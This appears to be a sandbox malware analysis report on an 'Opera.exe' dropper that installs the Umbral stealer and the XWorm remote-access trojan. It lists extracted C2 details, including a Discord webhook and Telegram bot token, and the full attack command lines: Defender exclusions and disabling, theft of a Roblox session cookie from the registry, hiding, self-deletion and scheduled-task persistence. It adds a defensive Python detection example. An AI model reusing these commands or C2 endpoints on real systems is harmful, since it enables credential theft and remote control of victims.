Analysis

  • max time kernel
    110s
  • max time network
    151s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    26-04-2024 13:15

General

  • Target

    Opera.exe

  • Size

    319KB

  • MD5

    f69924b642ac4b9ef1dfacdfd43759a9

  • SHA1

    95da50564c7cbc3749148419c68a08b0f2869ee1

  • SHA256

    d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

  • SHA512

    2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

  • SSDEEP

    6144:48loZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmiW2brXv5P:7oZRL+EP8DDUgoOJBiLHaIJtMQIL/5P

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

C2

phentermine-partial.gl.at.ply.gg:36969

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

  • telegram

    https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Signatures

  • Detect Umbral payload 3 IoCs
  • Detect Xworm Payload 3 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and other session data.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Opera.exe
    "C:\Users\Admin\AppData\Local\Temp\Opera.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4500
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
        3⤵
        • Views/modifies file attributes
        PID:4476
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5072
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:668
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        PID:2220
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:2992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1752
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:220
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2880
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • Runs ping.exe
          PID:4460
    • C:\Users\Admin\AppData\Local\Temp\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4472
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4204
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4224
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4580
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
        3⤵
        • Creates scheduled task(s)
        PID:2480
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:4716
  • C:\Users\Admin\AppData\Roaming\Client.exe
    C:\Users\Admin\AppData\Roaming\Client.exe
    1⤵
    • Executes dropped EXE
    PID:3372
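The Signatures list and the process tree above describe the same chain from two sides: Umbral3.exe hides itself with attrib, carves Defender exclusions and switches protections off with Set-MpPreference, fingerprints the host through wmic and the registry, and deletes itself behind a ping delay, while XClient.exe registers a minutely scheduled task for %AppData%\Client.exe. The block below is an added example, not code from the sandbox, from Tria.ge or from the Umbral/XWorm projects: it turns those behaviours into detection rules and runs them over constructed process-creation events modelled on the tree (pids and command lines copied from the report, parent pid 1000 for Opera.exe assumed). The event shape (Sysmon Event ID 1 style), rule names, flag thresholds and the ATT&CK technique mapping are the example's own assumptions.

```python
"""Added example: detection rules for the process chain in this report.
Events are constructed to mirror the process tree above (Sysmon Event ID 1 style:
pid, parent pid, image, command line); the event shape, rule names and ATT&CK
mapping are this example's own assumptions, not sandbox output."""
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")
Finding = namedtuple("Finding", "pid technique detail")  # technique = ATT&CK ID

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\Admin\AppData\Local\Temp"

# Constructed sample events modelled on the report's process tree (a subset).
SAMPLE_EVENTS = [
    ProcEvent(2660, 1000, rf"{TEMP}\Opera.exe", rf'"{TEMP}\Opera.exe"'),
    ProcEvent(4500, 2660, rf"{TEMP}\Umbral3.exe", rf'"{TEMP}\Umbral3.exe"'),
    ProcEvent(4476, 4500, r"C:\Windows\SYSTEM32\attrib.exe", rf'"attrib.exe" +h +s "{TEMP}\Umbral3.exe"'),
    ProcEvent(1420, 4500, PS, rf"powershell.exe Add-MpPreference -ExclusionPath '{TEMP}\Umbral3.exe'"),
    ProcEvent(2932, 4500, PS, "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true "
              "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true "
              "-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting "
              "Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"),
    ProcEvent(5028, 4500, PS, r"powershell.exe Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"),
    ProcEvent(2992, 4500, r"C:\Windows\System32\Wbem\wmic.exe", '"wmic.exe" csproduct get uuid'),
    ProcEvent(2880, 4500, r"C:\Windows\SYSTEM32\cmd.exe", rf'"cmd.exe" /c ping localhost && del /F /A h "{TEMP}\Umbral3.exe" && pause'),
    ProcEvent(4472, 2660, rf"{TEMP}\XClient.exe", rf'"{TEMP}\XClient.exe"'),
    ProcEvent(2480, 4472, r"C:\Windows\System32\schtasks.exe", r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"'),
]

WEAK_VALUES = {"$true", "disabled", "auditmode", "neversend"}  # Set-MpPreference values that weaken Defender
WMIC_DISCOVERY = ("csproduct get uuid", "os get caption", "computersystem get totalphysicalmemory", "win32_videocontroller get name")

def _is(ev, exe):
    return ev.image.lower().endswith("\\" + exe)

def rule_defender_tamper(ev, parent):
    # T1562.001: Add-/Set-MpPreference used to exclude the payload or switch protections off.
    m = re.search(r"\b(Add|Set)-MpPreference\b", ev.cmdline, re.I) if _is(ev, "powershell.exe") else None
    if not m:
        return None
    if m.group(1).lower() == "add":
        excl = re.findall(r"-Exclusion(Path|Process)\s+'?([^'\s]+)", ev.cmdline, re.I)
        return Finding(ev.pid, "T1562.001", "Defender exclusion: " + ", ".join(f"{k}={v}" for k, v in excl))
    sw = re.findall(r"-(Disable\w+|Enable\w+|MAPSReporting|SubmitSamplesConsent)\s+(\S+)", ev.cmdline)
    weakened = [k for k, v in sw if v.lower() in WEAK_VALUES]
    return Finding(ev.pid, "T1562.001", "Defender weakened: " + ", ".join(weakened)) if weakened else None

def rule_scheduled_task(ev, parent):
    # T1053.005: schtasks /create with a tight repeat, elevated run level or a user-writable target.
    if not _is(ev, "schtasks.exe") or "/create" not in ev.cmdline.lower():
        return None
    opts = {k.lower(): v.strip('"') for k, v in re.findall(r'/(sc|mo|rl|tn|tr)\s+("[^"]*"|\S+)', ev.cmdline, re.I)}
    flags = []
    if opts.get("rl", "").upper() == "HIGHEST":
        flags.append("RL=HIGHEST")
    if opts.get("sc", "").lower() == "minute" and opts.get("mo", "").isdigit() and int(opts["mo"]) <= 5:
        flags.append(f"repeats every {opts['mo']} min")
    if re.search(r"\\appdata\\", opts.get("tr", ""), re.I):
        flags.append("target under AppData")
    return Finding(ev.pid, "T1053.005", f"task {opts.get('tn')} -> {opts.get('tr')}: " + "; ".join(flags)) if flags else None

def rule_hidden_file(ev, parent):
    # T1564.001: attrib +h +s on a dropped executable.
    hidden = _is(ev, "attrib.exe") and re.search(r"\+h\b", ev.cmdline) and re.search(r"\+s\b", ev.cmdline)
    return Finding(ev.pid, "T1564.001", "hidden+system attributes set: " + ev.cmdline) if hidden else None

def rule_self_delete(ev, parent):
    # T1070.004: child cmd.exe uses ping as a delay, then deletes the parent's own image (lineage check).
    low = ev.cmdline.lower()
    hit = parent and _is(ev, "cmd.exe") and "ping" in low and re.search(r"\bdel\b", low) and parent.image.lower() in low
    return Finding(ev.pid, "T1070.004", f"{parent.image} deleted by its child cmd.exe") if hit else None

def rule_wmic_discovery(ev, parent):
    # T1082: host fingerprinting via wmic (OS caption, RAM, machine UUID, GPU name).
    hits = [q for q in WMIC_DISCOVERY if q in ev.cmdline.lower()] if _is(ev, "wmic.exe") else []
    return Finding(ev.pid, "T1082", "wmic " + hits[0]) if hits else None

def rule_registry_creds(ev, parent):
    # T1552.002: session cookie (.ROBLOSECURITY) read straight out of the registry.
    hit = _is(ev, "powershell.exe") and re.search(r"Get-ItemPropertyValue.*\.ROBLOSECURITY", ev.cmdline, re.I)
    return Finding(ev.pid, "T1552.002", ".ROBLOSECURITY read from registry") if hit else None

RULES = [rule_defender_tamper, rule_scheduled_task, rule_hidden_file, rule_self_delete, rule_wmic_discovery, rule_registry_creds]

def analyze(events):
    """Run every rule over every event; rules also receive the parent event for lineage checks."""
    by_pid = {e.pid: e for e in events}
    return [f for ev in events for rule in RULES if (f := rule(ev, by_pid.get(ev.ppid)))]

def techniques_by_root(events, findings):
    """Group distinct techniques under the top-most recorded ancestor (Opera.exe here),
    so the dropper tree is scored as a whole rather than each child on its own."""
    by_pid = {e.pid: e for e in events}
    out = {}
    for f in findings:
        pid = f.pid
        while by_pid[pid].ppid in by_pid:
            pid = by_pid[pid].ppid
        out.setdefault(pid, set()).add(f.technique)
    return {root: sorted(t) for root, t in out.items()}
```

Running `analyze(SAMPLE_EVENTS)` yields seven findings, and `techniques_by_root` rolls all six techniques up to pid 2660 (Opera.exe), which is the point of keeping parent pids in the events: the self-deletion rule only fires because the cmd.exe command line names its parent's image, and the per-tree roll-up is what lets an analyst score the dropper rather than six unrelated LOLBin alerts. The Set-MpPreference rule deliberately ignores the trailing `-SubmitSamplesConsent 2`, since that value does not weaken Defender.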

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

        Filesize

        654B

        MD5

        16c5fce5f7230eea11598ec11ed42862

        SHA1

        75392d4824706090f5e8907eee1059349c927600

        SHA256

        87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151

        SHA512

        153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        8592ba100a78835a6b94d5949e13dfc1

        SHA1

        63e901200ab9a57c7dd4c078d7f75dcd3b357020

        SHA256

        fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

        SHA512

        87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        338afe10d2e89a4c0a45c948e9d9ea42

        SHA1

        ad20bc0297e2dc6280e669ec76ac12959257d67e

        SHA256

        1ad3d40487ace460cfca036ecfdba4b73fa2bf2db557d4f58e0748aa0ac3faac

        SHA512

        c1e46ed28976586f6f5186237488c14517335595610c7eda6e53e956b645cef5894eeb436f8a25f54c4389ff553457090c770626e991e40688e7c3248fde43a2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        0b7ea66ebb4eca91e4794e6bc19c9a4a

        SHA1

        897f3586ecafe37072ea7786d4f25c359c8060ae

        SHA256

        607d7ac7291760fa591c46d11eff9f8510cafca50df9bf434a913fd0fa3a9cda

        SHA512

        32dff1aaf2519e1b4ac0f82d12037be4d1e1074c6dd0b6c4d41435541235523e7b7cba2bde62caaea576fc902f92275cb3100912b42db3d0cb69a0fe4ff308d1

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        6092470e6488d081f6ada7ae02ba571b

        SHA1

        80d148a208cb1cb0b3f86cab0cff663ad9897366

        SHA256

        a49dd75579b0c24ee1a87736a81394ff575006db5e21b4278f7eb157e65ce712

        SHA512

        85d91e254e98e5f393c7d9f258f3b963fbb79d4048f532a949ae69a715464de85588141ca256af0b0b4c175186fa036b2251ae73bbcaa2fec6333321392c2a57

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        3c2e48a34dbfbe7f8f175c9aeab9ccb8

        SHA1

        8ce17bd98159c3d0aec462ef21a308c4883003ef

        SHA256

        a0ba4fa76f5e68b5cc16cd268a43fe2f989587742f6157de0ff7ef230632390b

        SHA512

        43d5f9c1bda988ad4db7b4265ffdea57374ecf3f4fb04642f95720237a110b8aaec34bd133506f17511829c28bac0880571bd64cacb4e15905c1108ea272f0ac

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        62b4d6a1cae7e82266a3ae89ed95ebbf

        SHA1

        a6852adeafef92bfedc6f9916945366d7549d2a2

        SHA256

        9a8238ac7dfb77498b9dcb5b08cef4dde1eea0e6dbfda95a35c1f2cfe846c82a

        SHA512

        349cd192536e46f8f3aa08ac1f21fdfc72b16830030ff6fb56209022d8264eeef456f4a68769e4be2b25695fc708218b9edd2fe4fe54aae5473f22927e6884c9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        56fa67efa74c34191150ad3843de0dda

        SHA1

        cfa2905dba6ff57d4cf56d505714a2de10c1e19a

        SHA256

        03be8e43f5f7c434365a47890b01245814d2ccc6a3963ca664283c27e60fbde5

        SHA512

        57e721f275fda8947f4ad91dcc131a5a6482e61efcd623a618f1bcde4b79f6b43558070b2cd477eb1841d0f5de19334613e79204be126c2940cd4e5a911df877

      • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe

        Filesize

        229KB

        MD5

        7a902c87a60986f18a6b097712299256

        SHA1

        2c01906a39faa9d27a41e0d3cd84e92410b9c483

        SHA256

        e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5

        SHA512

        c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

      • C:\Users\Admin\AppData\Local\Temp\XClient.exe

        Filesize

        80KB

        MD5

        3fc932775533f1bcea180de679a902dd

        SHA1

        3f393d02af4653e34bf5526ec5b6f8d6e4df65e8

        SHA256

        09a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a

        SHA512

        f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wyiubl4u.vtg.ps1

        Filesize

        1B

        MD5

        c4ca4238a0b923820dcc509a6f75849b

        SHA1

        356a192b7913b04c54574d18c28d46e6395428ab

        SHA256

        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

        SHA512

        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      • memory/1420-24-0x00000210E6D50000-0x00000210E6DC6000-memory.dmp

        Filesize

        472KB

      • memory/1420-20-0x00000210E6140000-0x00000210E6162000-memory.dmp

        Filesize

        136KB

      • memory/2660-11-0x0000000000400000-0x0000000000457000-memory.dmp

        Filesize

        348KB

      • memory/4472-14-0x00007FFD618A0000-0x00007FFD6228C000-memory.dmp

        Filesize

        9.9MB

      • memory/4472-12-0x0000000000FC0000-0x0000000000FDA000-memory.dmp

        Filesize

        104KB

      • memory/4472-381-0x00007FFD618A0000-0x00007FFD6228C000-memory.dmp

        Filesize

        9.9MB

      • memory/4500-98-0x0000027C64D20000-0x0000027C64D3E000-memory.dmp

        Filesize

        120KB

      • memory/4500-97-0x0000027C64D80000-0x0000027C64DD0000-memory.dmp

        Filesize

        320KB

      • memory/4500-186-0x0000027C7D6F0000-0x0000027C7D702000-memory.dmp

        Filesize

        72KB

      • memory/4500-185-0x0000027C64D40000-0x0000027C64D4A000-memory.dmp

        Filesize

        40KB

      • memory/4500-15-0x0000027C7D780000-0x0000027C7D790000-memory.dmp

        Filesize

        64KB

      • memory/4500-13-0x00007FFD618A0000-0x00007FFD6228C000-memory.dmp

        Filesize

        9.9MB

      • memory/4500-374-0x00007FFD618A0000-0x00007FFD6228C000-memory.dmp

        Filesize

        9.9MB

      • memory/4500-10-0x0000027C630E0000-0x0000027C63120000-memory.dmp

        Filesize

        256KB